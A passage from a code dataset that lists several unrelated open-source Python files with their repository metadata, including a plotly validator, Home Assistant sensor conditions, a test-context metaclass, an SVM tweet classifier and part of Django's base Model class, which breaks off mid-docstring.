text
stringlengths 4
1.02M
| meta
dict |
|---|---|
class File(In.entity.Entity):
'''File Entity class.
'''
def __init__(self, data = None, items = None, **args):
self.nabar_id = 0
self.size = 0
self.mime1 = None
self.mime2 = None
self.path = None
self.tmp_path = None # temporary uploaded path
self.remote = 0
self.private = 0
self.data = {}
super().__init__(data, items, **args)
@IN.register('File', type = 'Entitier')
class FileEntitier(In.entity.EntityEntitier):
'''Base File Entitier'''
# File needs entity insert/update/delete hooks
invoke_entity_hook = True
# load all is very heavy
entity_load_all = False
@IN.register('File', type = 'Model')
class FileModel(In.entity.EntityModel):
'''File Model'''
@IN.hook
def entity_model():
return {
'File' : { # entity name
'table' : { # table
'name' : 'file',
'columns' : { # table columns / entity attributes
'id' : {},
'type' : {},
'created' : {},
'status' : {},
'nabar_id' : {},
'path' : {}, # file path
'size' : {}, # bytes
'mime1' : {}, # mime main type : image, audio, video
'mime2' : {}, # mime secondary type : jpeg, mpeg
'remote': {}, # 0 - local, 1 - remote file
'private' : {}, # 0 - public, 1 - private file
'data' : {}, # file data
},
'keys' : {
'primary' : 'id',
},
},
},
}
@IN.register('File', type = 'Themer')
class FileThemer(In.entity.EntityThemer):
'''File themer'''
builtins.File = File
|
{
"content_hash": "98b557a72150a6638a56cf6d14ce3d55",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 58,
"avg_line_length": 21.73134328358209,
"alnum_prop": 0.5625,
"repo_name": "vinoth3v/In",
"id": "917e20b7d97b0a50c3e0dfd68f3a108ec38d89e7",
"size": "1457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "In/filer/entity_file.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "33032"
},
{
"name": "Python",
"bytes": "779047"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class HoverinfosrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="hoverinfosrc", parent_name="candlestick", **kwargs):
super(HoverinfosrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
{
"content_hash": "091ab6f64633c5f8d1666e4aade3b9ee",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 88,
"avg_line_length": 38.083333333333336,
"alnum_prop": 0.6214442013129103,
"repo_name": "plotly/python-api",
"id": "04b3e9315624c34aba4bc03010b59ad874812c2b",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/candlestick/_hoverinfosrc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
}
|
import unittest
import unittest.mock
import re
import logging
import typing # noqa (use mypy typing)
import warnings
from typing import Any
from typing import Callable
from torment import decorators
from torment import fixtures
logger = logging.getLogger(__name__)
@property
def _module(self) -> str:
'''Actual module name corresponding to this context's testing module.'''
return re.sub(r'\.[^.]+', '', self.__module__.replace('test_', ''), 1)
class MetaContext(type):
'''``torment.TestContext`` class creator.
Generates all testing methods that correspond with the fixtures associated
with a ``torment.TestContext``. Also updates the definitions of
``mocks_mask`` and ``mocks`` to include the union of all involved classes
in the creation process (all parent classes and the class being created).
When creating a ``torment.TestContext`` subclass, ensure you specify this
class as its metaclass to automatically generate test cases based on its
``fixture_classes`` property.
'''
module = _module
def __init__(cls, name, bases, dct) -> None:
super(MetaContext, cls).__init__(name, bases, dct)
cls.mocks_mask = set().union(getattr(cls, 'mocks_mask', set()), *[ getattr(base, 'mocks_mask', set()) for base in bases ])
cls.mocks = set().union(getattr(cls, 'mocks', set()), *[ getattr(base, 'mocks', set()) for base in bases ])
cls.docker_compose_services = set().union(getattr(cls, 'docker_compose_services', set()), *[ getattr(base, 'docker_compose_services', set()) for base in bases ])
def generate_case(fixture: fixtures.Fixture) -> Callable[[Any], None]:
'''Generate a ``unittest.TestCase`` compatible test method.
Parameters
----------
:``fixture``: the fixture to transform into a ``unittest.TestCase``
compatible test method
Return Value(s)
---------------
An acceptable method that nose will execute as a test case.
'''
def case(self) -> None:
fixture.context = self
fixture._execute()
case.__name__ = fixture.name
case.__doc__ = fixture.description
if len(cls.mocks_mask):
case.__doc__ += '—unmocked:' + ','.join(sorted(cls.mocks_mask))
return case
if not hasattr(cls, 'fixture_classes'):
warnings.warn('type object \'{0}\' has no attribute \'fixture_classes\'')
else:
for fixture in fixtures.of(cls.fixture_classes, context = cls):
_ = generate_case(fixture)
setattr(cls, _.__name__, _)
class TestContext(unittest.TestCase):
'''Environment for Fixture execution.
Provides convenience methods indicating the environment a Fixture is
executing in. This includes a references to the real module corresponding
to the context's testing module as well as a housing for the assertion
methods.
Inherits most of its functionality from ``unittest.TestCase`` with a couple
of additions. TestContext does extend setUp.
When used in conjunction with ``torment.MetaContext``, the
``fixture_classes`` property must be an iterable of subclasses of
``torment.fixtures.Fixture``.
**Properties**
* ``module``
**Public Methods**
* ``patch``
**Class Variables**
:``mocks_mask``: set of mocks to mask from being mocked
:``mocks``: set of mocks this TestContext provides
'''
mocks_mask = set() # type: Set[str]
mocks = set() # type: Set[str]
module = _module
def setUp(self) -> None:
super().setUp()
logger.debug('self.__class__.mocks_mask: %s', self.__class__.mocks_mask)
logger.debug('self.__class__.mocks: %s', self.__class__.mocks)
@decorators.log
def patch(self, name: str, relative: bool = True) -> None:
'''Patch name with mock in actual module.
Sets up mock objects for the given symbol in the actual module
corresponding to this context's testing module.
**Parameters**
:``name``: the symbol to mock—must exist in the actual module under test
:``relative``: prefix actual module corresponding to this context's
testing module to the given symbol to patch
'''
prefix = ''
if relative:
prefix = self.module + '.'
logger.debug('prefix: %s', prefix)
_ = unittest.mock.patch(prefix + name)
setattr(self, 'mocked_' + name.replace('.', '_').strip('_'), _.start())
self.addCleanup(_.stop)
|
{
"content_hash": "3497317ce5466a0b4074f77b9de52ea0",
"timestamp": "",
"source": "github",
"line_count": 149,
"max_line_length": 169,
"avg_line_length": 31.503355704697988,
"alnum_prop": 0.6105666808691947,
"repo_name": "devx/torment",
"id": "a05eb82cfd1f1198a9b4ff6876933b019a1f7780",
"size": "5274",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "torment/contexts/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "92301"
}
],
"symlink_target": ""
}
|
"""Provides device conditions for sensors."""
from __future__ import annotations
import voluptuous as vol
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.const import CONF_ABOVE, CONF_BELOW, CONF_ENTITY_ID, CONF_TYPE
from homeassistant.core import HomeAssistant, HomeAssistantError, callback
from homeassistant.helpers import condition, config_validation as cv
from homeassistant.helpers.entity import get_device_class, get_unit_of_measurement
from homeassistant.helpers.entity_registry import (
async_entries_for_device,
async_get_registry,
)
from homeassistant.helpers.typing import ConfigType
from . import DOMAIN, SensorDeviceClass
# mypy: allow-untyped-defs, no-check-untyped-defs
DEVICE_CLASS_NONE = "none"
CONF_IS_APPARENT_POWER = "is_apparent_power"
CONF_IS_BATTERY_LEVEL = "is_battery_level"
CONF_IS_CO = "is_carbon_monoxide"
CONF_IS_CO2 = "is_carbon_dioxide"
CONF_IS_CURRENT = "is_current"
CONF_IS_ENERGY = "is_energy"
CONF_IS_FREQUENCY = "is_frequency"
CONF_IS_HUMIDITY = "is_humidity"
CONF_IS_GAS = "is_gas"
CONF_IS_ILLUMINANCE = "is_illuminance"
CONF_IS_NITROGEN_DIOXIDE = "is_nitrogen_dioxide"
CONF_IS_NITROGEN_MONOXIDE = "is_nitrogen_monoxide"
CONF_IS_NITROUS_OXIDE = "is_nitrous_oxide"
CONF_IS_OZONE = "is_ozone"
CONF_IS_PM1 = "is_pm1"
CONF_IS_PM10 = "is_pm10"
CONF_IS_PM25 = "is_pm25"
CONF_IS_POWER = "is_power"
CONF_IS_POWER_FACTOR = "is_power_factor"
CONF_IS_PRESSURE = "is_pressure"
CONF_IS_REACTIVE_POWER = "is_reactive_power"
CONF_IS_SIGNAL_STRENGTH = "is_signal_strength"
CONF_IS_SULPHUR_DIOXIDE = "is_sulphur_dioxide"
CONF_IS_TEMPERATURE = "is_temperature"
CONF_IS_VOLATILE_ORGANIC_COMPOUNDS = "is_volatile_organic_compounds"
CONF_IS_VOLTAGE = "is_voltage"
CONF_IS_VALUE = "is_value"
ENTITY_CONDITIONS = {
SensorDeviceClass.APPARENT_POWER: [{CONF_TYPE: CONF_IS_APPARENT_POWER}],
SensorDeviceClass.BATTERY: [{CONF_TYPE: CONF_IS_BATTERY_LEVEL}],
SensorDeviceClass.CO: [{CONF_TYPE: CONF_IS_CO}],
SensorDeviceClass.CO2: [{CONF_TYPE: CONF_IS_CO2}],
SensorDeviceClass.CURRENT: [{CONF_TYPE: CONF_IS_CURRENT}],
SensorDeviceClass.ENERGY: [{CONF_TYPE: CONF_IS_ENERGY}],
SensorDeviceClass.FREQUENCY: [{CONF_TYPE: CONF_IS_FREQUENCY}],
SensorDeviceClass.GAS: [{CONF_TYPE: CONF_IS_GAS}],
SensorDeviceClass.HUMIDITY: [{CONF_TYPE: CONF_IS_HUMIDITY}],
SensorDeviceClass.ILLUMINANCE: [{CONF_TYPE: CONF_IS_ILLUMINANCE}],
SensorDeviceClass.NITROGEN_DIOXIDE: [{CONF_TYPE: CONF_IS_NITROGEN_DIOXIDE}],
SensorDeviceClass.NITROGEN_MONOXIDE: [{CONF_TYPE: CONF_IS_NITROGEN_MONOXIDE}],
SensorDeviceClass.NITROUS_OXIDE: [{CONF_TYPE: CONF_IS_NITROUS_OXIDE}],
SensorDeviceClass.OZONE: [{CONF_TYPE: CONF_IS_OZONE}],
SensorDeviceClass.POWER: [{CONF_TYPE: CONF_IS_POWER}],
SensorDeviceClass.POWER_FACTOR: [{CONF_TYPE: CONF_IS_POWER_FACTOR}],
SensorDeviceClass.PM1: [{CONF_TYPE: CONF_IS_PM1}],
SensorDeviceClass.PM10: [{CONF_TYPE: CONF_IS_PM10}],
SensorDeviceClass.PM25: [{CONF_TYPE: CONF_IS_PM25}],
SensorDeviceClass.PRESSURE: [{CONF_TYPE: CONF_IS_PRESSURE}],
SensorDeviceClass.REACTIVE_POWER: [{CONF_TYPE: CONF_IS_REACTIVE_POWER}],
SensorDeviceClass.SIGNAL_STRENGTH: [{CONF_TYPE: CONF_IS_SIGNAL_STRENGTH}],
SensorDeviceClass.SULPHUR_DIOXIDE: [{CONF_TYPE: CONF_IS_SULPHUR_DIOXIDE}],
SensorDeviceClass.TEMPERATURE: [{CONF_TYPE: CONF_IS_TEMPERATURE}],
SensorDeviceClass.VOLATILE_ORGANIC_COMPOUNDS: [
{CONF_TYPE: CONF_IS_VOLATILE_ORGANIC_COMPOUNDS}
],
SensorDeviceClass.VOLTAGE: [{CONF_TYPE: CONF_IS_VOLTAGE}],
DEVICE_CLASS_NONE: [{CONF_TYPE: CONF_IS_VALUE}],
}
CONDITION_SCHEMA = vol.All(
cv.DEVICE_CONDITION_BASE_SCHEMA.extend(
{
vol.Required(CONF_ENTITY_ID): cv.entity_id,
vol.Required(CONF_TYPE): vol.In(
[
CONF_IS_APPARENT_POWER,
CONF_IS_BATTERY_LEVEL,
CONF_IS_CO,
CONF_IS_CO2,
CONF_IS_CURRENT,
CONF_IS_ENERGY,
CONF_IS_FREQUENCY,
CONF_IS_GAS,
CONF_IS_HUMIDITY,
CONF_IS_ILLUMINANCE,
CONF_IS_OZONE,
CONF_IS_NITROGEN_DIOXIDE,
CONF_IS_NITROGEN_MONOXIDE,
CONF_IS_NITROUS_OXIDE,
CONF_IS_POWER,
CONF_IS_POWER_FACTOR,
CONF_IS_PM1,
CONF_IS_PM10,
CONF_IS_PM25,
CONF_IS_PRESSURE,
CONF_IS_REACTIVE_POWER,
CONF_IS_SIGNAL_STRENGTH,
CONF_IS_SULPHUR_DIOXIDE,
CONF_IS_TEMPERATURE,
CONF_IS_VOLATILE_ORGANIC_COMPOUNDS,
CONF_IS_VOLTAGE,
CONF_IS_VALUE,
]
),
vol.Optional(CONF_BELOW): vol.Any(vol.Coerce(float)),
vol.Optional(CONF_ABOVE): vol.Any(vol.Coerce(float)),
}
),
cv.has_at_least_one_key(CONF_BELOW, CONF_ABOVE),
)
async def async_get_conditions(
hass: HomeAssistant, device_id: str
) -> list[dict[str, str]]:
"""List device conditions."""
conditions: list[dict[str, str]] = []
entity_registry = await async_get_registry(hass)
entries = [
entry
for entry in async_entries_for_device(entity_registry, device_id)
if entry.domain == DOMAIN
]
for entry in entries:
device_class = get_device_class(hass, entry.entity_id) or DEVICE_CLASS_NONE
unit_of_measurement = get_unit_of_measurement(hass, entry.entity_id)
if not unit_of_measurement:
continue
templates = ENTITY_CONDITIONS.get(
device_class, ENTITY_CONDITIONS[DEVICE_CLASS_NONE]
)
conditions.extend(
{
**template,
"condition": "device",
"device_id": device_id,
"entity_id": entry.entity_id,
"domain": DOMAIN,
}
for template in templates
)
return conditions
@callback
def async_condition_from_config(
hass: HomeAssistant, config: ConfigType
) -> condition.ConditionCheckerType:
"""Evaluate state based on configuration."""
numeric_state_config = {
condition.CONF_CONDITION: "numeric_state",
condition.CONF_ENTITY_ID: config[CONF_ENTITY_ID],
}
if CONF_ABOVE in config:
numeric_state_config[condition.CONF_ABOVE] = config[CONF_ABOVE]
if CONF_BELOW in config:
numeric_state_config[condition.CONF_BELOW] = config[CONF_BELOW]
numeric_state_config = cv.NUMERIC_STATE_CONDITION_SCHEMA(numeric_state_config)
numeric_state_config = condition.numeric_state_validate_config(
hass, numeric_state_config
)
return condition.async_numeric_state_from_config(numeric_state_config)
async def async_get_condition_capabilities(hass, config):
"""List condition capabilities."""
try:
unit_of_measurement = get_unit_of_measurement(hass, config[CONF_ENTITY_ID])
except HomeAssistantError:
unit_of_measurement = None
if not unit_of_measurement:
raise InvalidDeviceAutomationConfig(
"No unit of measurement found for condition entity {config[CONF_ENTITY_ID]}"
)
return {
"extra_fields": vol.Schema(
{
vol.Optional(
CONF_ABOVE, description={"suffix": unit_of_measurement}
): vol.Coerce(float),
vol.Optional(
CONF_BELOW, description={"suffix": unit_of_measurement}
): vol.Coerce(float),
}
)
}
|
{
"content_hash": "55a0363b696b3ab8f8e1721f6fff581e",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 88,
"avg_line_length": 37.42583732057416,
"alnum_prop": 0.6328304781385835,
"repo_name": "home-assistant/home-assistant",
"id": "229e5069069c3516f350fccf27f3030dae05ae81",
"size": "7822",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensor/device_condition.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
from sklearn import svm
class Models(object):
def __init__(self, trained, evaluations, classify):
self.trained = trained
self.evaluations = evaluations
self.classify = classify
self.result = list()
def svm_linear(self):
"""
Classification tweets with linear Support Vector Machine
"""
classification = svm.SVC(kernel='linear')
classification.fit(self.trained, self.evaluations)
prediction = classification.predict(self.classify)
for p in prediction:
self.result.append(p)
print "\n##############################################################"
print "The classification result of %d tweets is:\n" % len(self.result)
print "Positive: %d tweets" % self.result.count(1)
print "Negative: %d tweets" % self.result.count(2)
print "Neutral: %d tweets" % self.result.count(3)
print "Unknown: %d tweets" % self.result.count(4)
return prediction
|
{
"content_hash": "b3f440a65443ec6474df88bb4a192bdc",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 80,
"avg_line_length": 34,
"alnum_prop": 0.5745098039215686,
"repo_name": "fernandopso/twitter-svm-tfidf.py",
"id": "16ad9e6a7b3eee0e2c53641f093db8cd2af84360",
"size": "1069",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/miner/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24330"
}
],
"symlink_target": ""
}
|
import copy
import inspect
import warnings
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.core import checks
from django.core.exceptions import (
NON_FIELD_ERRORS, FieldDoesNotExist, FieldError, MultipleObjectsReturned,
ObjectDoesNotExist, ValidationError,
)
from django.db import (
DEFAULT_DB_ALIAS, DJANGO_VERSION_PICKLE_KEY, DatabaseError, connection,
connections, router, transaction,
)
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import CASCADE, Collector
from django.db.models.fields.related import (
ForeignObjectRel, OneToOneField, lazy_related_operation, resolve_relation,
)
from django.db.models.manager import Manager
from django.db.models.options import Options
from django.db.models.query import Q
from django.db.models.signals import (
class_prepared, post_init, post_save, pre_init, pre_save,
)
from django.db.models.utils import make_model_tuple
from django.utils.encoding import force_text
from django.utils.functional import curry
from django.utils.text import capfirst, get_text_list
from django.utils.translation import gettext_lazy as _
from django.utils.version import get_version
class Deferred:
def __repr__(self):
return '<Deferred field>'
def __str__(self):
return '<Deferred field>'
DEFERRED = Deferred()
def subclass_exception(name, parents, module, attached_to=None):
"""
Create exception subclass. Used by ModelBase below.
If 'attached_to' is supplied, the exception will be created in a way that
allows it to be pickled, assuming the returned exception class will be added
as an attribute to the 'attached_to' class.
"""
class_dict = {'__module__': module}
if attached_to is not None:
def __reduce__(self):
# Exceptions are special - they've got state that isn't
# in self.__dict__. We assume it is all in self.args.
return (unpickle_inner_exception, (attached_to, name), self.args)
def __setstate__(self, args):
self.args = args
class_dict['__reduce__'] = __reduce__
class_dict['__setstate__'] = __setstate__
return type(name, parents, class_dict)
class ModelBase(type):
"""Metaclass for all models."""
def __new__(cls, name, bases, attrs):
super_new = super().__new__
# Also ensure initialization is only performed for subclasses of Model
# (excluding Model class itself).
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_attrs = {'__module__': module}
classcell = attrs.pop('__classcell__', None)
if classcell is not None:
new_attrs['__classcell__'] = classcell
new_class = super_new(cls, name, bases, new_attrs)
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
app_label = None
# Look for an application configuration to attach the model to.
app_config = apps.get_containing_app_config(module)
if getattr(meta, 'app_label', None) is None:
if app_config is None:
if not abstract:
raise RuntimeError(
"Model class %s.%s doesn't declare an explicit "
"app_label and isn't in an application in "
"INSTALLED_APPS." % (module, name)
)
else:
app_label = app_config.label
new_class.add_to_class('_meta', Options(meta, app_label))
if not abstract:
new_class.add_to_class(
'DoesNotExist',
subclass_exception(
'DoesNotExist',
tuple(
x.DoesNotExist for x in parents if hasattr(x, '_meta') and not x._meta.abstract
) or (ObjectDoesNotExist,),
module,
attached_to=new_class))
new_class.add_to_class(
'MultipleObjectsReturned',
subclass_exception(
'MultipleObjectsReturned',
tuple(
x.MultipleObjectsReturned for x in parents if hasattr(x, '_meta') and not x._meta.abstract
) or (MultipleObjectsReturned,),
module,
attached_to=new_class))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
# If the model is a proxy, ensure that the base class
# hasn't been swapped out.
if is_proxy and base_meta and base_meta.swapped:
raise TypeError("%s cannot proxy the swapped model '%s'." % (name, base_meta.swapped))
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = chain(
new_class._meta.local_fields,
new_class._meta.local_many_to_many,
new_class._meta.private_fields
)
field_names = {f.name for f in new_fields}
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [kls for kls in parents if hasattr(kls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError(
"Abstract base class containing model fields not "
"permitted for proxy model '%s'." % name
)
else:
continue
if base is None:
base = parent
elif parent._meta.concrete_model is not base._meta.concrete_model:
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
new_class._meta.setup_proxy(base)
new_class._meta.concrete_model = base._meta.concrete_model
else:
new_class._meta.concrete_model = new_class
# Collect the parent links for multi-table inheritance.
parent_links = {}
for base in reversed([new_class] + parents):
# Conceptually equivalent to `if base is Model`.
if not hasattr(base, '_meta'):
continue
# Skip concrete parent classes.
if base != new_class and not base._meta.abstract:
continue
# Locate OneToOneField instances.
for field in base._meta.local_fields:
if isinstance(field, OneToOneField):
related = resolve_relation(new_class, field.remote_field.model)
parent_links[make_model_tuple(related)] = field
# Track fields inherited from base models.
inherited_attributes = set()
# Do the appropriate setup for any model parents.
for base in new_class.mro():
if base not in parents or not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
inherited_attributes |= set(base.__dict__.keys())
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
if not base._meta.abstract:
# Check for clashes between locally declared fields and those
# on the base classes.
for field in parent_fields:
if field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes with field of '
'the same name from base class %r.' % (
field.name,
name,
base.__name__,
)
)
else:
inherited_attributes.add(field.name)
# Concrete classes...
base = base._meta.concrete_model
base_key = make_model_tuple(base)
if base_key in parent_links:
field = parent_links[base_key]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.model_name
field = OneToOneField(
base,
on_delete=CASCADE,
name=attr_name,
auto_created=True,
parent_link=True,
)
if attr_name in field_names:
raise FieldError(
"Auto-generated field '%s' in class %r for "
"parent_link to base class %r clashes with "
"declared field of the same name." % (
attr_name,
name,
base.__name__,
)
)
# Only add the ptr field if it's not already present;
# e.g. migrations will already have it specified
if not hasattr(new_class, attr_name):
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
base_parents = base._meta.parents.copy()
# Add fields from abstract base class if it wasn't overridden.
for field in parent_fields:
if (field.name not in field_names and
field.name not in new_class.__dict__ and
field.name not in inherited_attributes):
new_field = copy.deepcopy(field)
new_class.add_to_class(field.name, new_field)
# Replace parent links defined on this base by the new
# field. It will be appropriately resolved if required.
if field.one_to_one:
for parent, parent_link in base_parents.items():
if field == parent_link:
base_parents[parent] = new_field
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base_parents)
# Inherit private fields (like GenericForeignKey) from the parent
# class
for field in base._meta.private_fields:
if field.name in field_names:
if not base._meta.abstract:
raise FieldError(
'Local field %r in class %r clashes with field of '
'the same name from base class %r.' % (
field.name,
name,
base.__name__,
)
)
else:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Set the name of _meta.indexes. This can't be done in
# Options.contribute_to_class() because fields haven't been added to
# the model at that point.
for index in new_class._meta.indexes:
if not index.name:
index.set_name_with_model(new_class)
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
new_class._meta.apps.register_model(new_class._meta.app_label, new_class)
return new_class
def add_to_class(cls, name, value):
# We should call the contribute_to_class method only if it's bound
if not inspect.isclass(value) and hasattr(value, 'contribute_to_class'):
value.contribute_to_class(cls, name)
else:
setattr(cls, name, value)
def _prepare(cls):
"""Create some methods once self._meta has been populated."""
opts = cls._meta
opts._prepare(cls)
if opts.order_with_respect_to:
cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
# Defer creating accessors on the foreign class until it has been
# created and registered. If remote_field is None, we're ordering
# with respect to a GenericForeignKey and don't know what the
# foreign class is - we'll add those accessors later in
# contribute_to_class().
if opts.order_with_respect_to.remote_field:
wrt = opts.order_with_respect_to
remote = wrt.remote_field.model
lazy_related_operation(make_foreign_order_accessors, cls, remote)
# Give the class a docstring -- its definition.
if cls.__doc__ is None:
cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join(f.name for f in opts.fields))
get_absolute_url_override = settings.ABSOLUTE_URL_OVERRIDES.get(opts.label_lower)
if get_absolute_url_override:
setattr(cls, 'get_absolute_url', get_absolute_url_override)
if not opts.managers:
if any(f.name == 'objects' for f in opts.fields):
raise ValueError(
"Model %s must specify a custom Manager, because it has a "
"field named 'objects'." % cls.__name__
)
manager = Manager()
manager.auto_created = True
cls.add_to_class('objects', manager)
class_prepared.send(sender=cls)
@property
def _base_manager(cls):
return cls._meta.base_manager
@property
def _default_manager(cls):
return cls._meta.default_manager
class ModelState:
"""Store model instance state."""
def __init__(self, db=None):
self.db = db
# If true, uniqueness validation checks will consider this a new, as-yet-unsaved object.
# Necessary for correct validation of new instances of objects with explicit (non-auto) PKs.
# This impacts validation only; it has no effect on the actual save.
self.adding = True
class Model(metaclass=ModelBase):
def __init__(self, *args, **kwargs):
# Alias some things as locals to avoid repeat global lookups
cls = self.__class__
opts = self._meta
_setattr = setattr
_DEFERRED = DEFERRED
pre_init.send(sender=cls, args=args, kwargs=kwargs)
# Set up the storage for instance state
self._state = ModelState()
# There is a rather weird disparity here; if kwargs, it's set, then args
# overrides it. It should be one or the other; don't duplicate the work
# The reason for the kwargs check is that standard iterator passes in by
# args, and instantiation for iteration is 33% faster.
if len(args) > len(opts.concrete_fields):
# Daft, but matches old exception sans the err msg.
raise IndexError("Number of args exceeds number of fields")
if not kwargs:
fields_iter = iter(opts.concrete_fields)
# The ordering of the zip calls matter - zip throws StopIteration
# when an iter throws it. So if the first iter throws it, the second
# is *not* consumed. We rely on this, so don't change the order
# without changing the logic.
for val, field in zip(args, fields_iter):
if val is _DEFERRED:
continue
_setattr(self, field.attname, val)
else:
# Slower, kwargs-ready version.
fields_iter = iter(opts.fields)
for val, field in zip(args, fields_iter):
if val is _DEFERRED:
continue
_setattr(self, field.attname, val)
kwargs.pop(field.name, None)
# Now we're left with the unprocessed fields that *must* come from
# keywords, or default.
for field in fields_iter:
is_related_object = False
# Virtual field
if field.attname not in kwargs and field.column is None:
continue
if kwargs:
if isinstance(field.remote_field, ForeignObjectRel):
try:
# Assume object instance was passed in.
rel_obj = kwargs.pop(field.name)
is_related_object = True
except KeyError:
try:
# Object instance wasn't passed in -- must be an ID.
val = kwargs.pop(field.attname)
except KeyError:
val = field.get_default()
else:
# Object instance was passed in. Special case: You can
# pass in "None" for related objects if it's allowed.
if rel_obj is None and field.null:
val = None
else:
try:
val = kwargs.pop(field.attname)
except KeyError:
# This is done with an exception rather than the
# default argument on pop because we don't want
# get_default() to be evaluated, and then not used.
# Refs #12057.
val = field.get_default()
else:
val = field.get_default()
if is_related_object:
# If we are passed a related instance, set it using the
# field.name instead of field.attname (e.g. "user" instead of
# "user_id") so that the object gets properly cached (and type
# checked) by the RelatedObjectDescriptor.
if rel_obj is not _DEFERRED:
_setattr(self, field.name, rel_obj)
else:
if val is not _DEFERRED:
_setattr(self, field.attname, val)
if kwargs:
property_names = opts._property_names
for prop in tuple(kwargs):
try:
# Any remaining kwargs must correspond to properties or
# virtual fields.
if prop in property_names or opts.get_field(prop):
if kwargs[prop] is not _DEFERRED:
_setattr(self, prop, kwargs[prop])
del kwargs[prop]
except (AttributeError, FieldDoesNotExist):
pass
if kwargs:
raise TypeError("'%s' is an invalid keyword argument for this function" % list(kwargs)[0])
super().__init__()
post_init.send(sender=cls, instance=self)
@classmethod
def from_db(cls, db, field_names, values):
if len(values) != len(cls._meta.concrete_fields):
values = list(values)
values.reverse()
values = [values.pop() if f.attname in field_names else DEFERRED for f in cls._meta.concrete_fields]
new = cls(*values)
new._state.adding = False
new._state.db = db
return new
def __repr__(self):
try:
u = str(self)
except (UnicodeEncodeError, UnicodeDecodeError):
u = '[Bad Unicode data]'
return '<%s: %s>' % (self.__class__.__name__, u)
def __str__(self):
return '%s object' % self.__class__.__name__
def __eq__(self, other):
if not isinstance(other, Model):
return False
if self._meta.concrete_model != other._meta.concrete_model:
return False
my_pk = self._get_pk_val()
if my_pk is None:
return self is other
return my_pk == other._get_pk_val()
def __hash__(self):
if self._get_pk_val() is None:
raise TypeError("Model instances without primary key value are unhashable")
return hash(self._get_pk_val())
def __reduce__(self):
data = self.__dict__
data[DJANGO_VERSION_PICKLE_KEY] = get_version()
class_id = self._meta.app_label, self._meta.object_name
return model_unpickle, (class_id,), data
def __setstate__(self, state):
msg = None
pickled_version = state.get(DJANGO_VERSION_PICKLE_KEY)
if pickled_version:
current_version = get_version()
if current_version != pickled_version:
msg = (
"Pickled model instance's Django version %s does not match "
"the current version %s." % (pickled_version, current_version)
)
else:
msg = "Pickled model instance's Django version is not specified."
if msg:
warnings.warn(msg, RuntimeWarning, stacklevel=2)
self.__dict__.update(state)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
def _set_pk_val(self, value):
return setattr(self, self._meta.pk.attname, value)
pk = property(_get_pk_val, _set_pk_val)
def get_deferred_fields(self):
"""
Return a set containing names of deferred fields for this instance.
"""
return {
f.attname for f in self._meta.concrete_fields
if f.attname not in self.__dict__
}
def refresh_from_db(self, using=None, fields=None):
"""
Reload field values from the database.
By default, the reloading happens from the database this instance was
loaded from, or by the read router if this instance wasn't loaded from
any database. The using parameter will override the default.
Fields can be used to specify which fields to reload. The fields
should be an iterable of field attnames. If fields is None, then
all non-deferred fields are reloaded.
